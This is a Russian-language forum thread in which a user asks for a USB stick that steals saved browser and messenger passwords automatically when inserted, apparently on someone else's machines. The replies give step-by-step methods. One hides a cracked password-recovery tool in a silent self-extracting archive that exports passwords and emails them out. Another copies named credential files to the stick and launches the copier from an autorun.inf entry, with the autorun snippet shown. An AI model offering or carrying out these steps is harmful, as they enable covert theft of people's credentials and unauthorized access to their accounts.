Всем привет! Интересует данная тема - флешка-вор паролей. К сожалению, USBThief безнадежно устарел и я никак не могу найти достойный аналог. Посоветуйте что-нибудь пожалуйста. Интересуют пароли во всех браузерах и в IM'ах типа ICQ, QIP, QIP Infium. Нужно сделать так, чтобы "флешку вставил, флешка сама все сделала и забрал флешку". Знаю, что можно разбить флешку на 2 устройства - флешка и CD привод с ISO, который автозапускается замечательно. Буду благодарен за любые советы! P.S. не себе =)
берешь портативный кракнутый мпр,в инишнике его меняешь расположение окна 2000*2000, создаешь батник вида mpr.exe /export ren *.mpf %filename%.mpf записываешь команду отправки мыл (blat вроде называется прога) все файлы засовываешь в winrar,выбираешь опцию SFX, затем выбираешь скрытую распаковку,затем выбираешь запуск батника после распаковки.все.
лучше написать собственную реализацию паролепиздилки: либо реверсировать нужные программы и разгадать алгоритм шифрования паролей, а потом реализовать в программе,либо просто релизовать копирование нужных файлов(wand.dat от оперы, signons.sqlite, *.qip;*.bip от qip2010, *.pwl От windows ras и т.д.) в папку на флэшке а потом уже дома расшифровать mpr-кой. прописать программу в autorun.inf Типа: Code: [autorun] open=pass_pizdelka.exe и грабить машины =)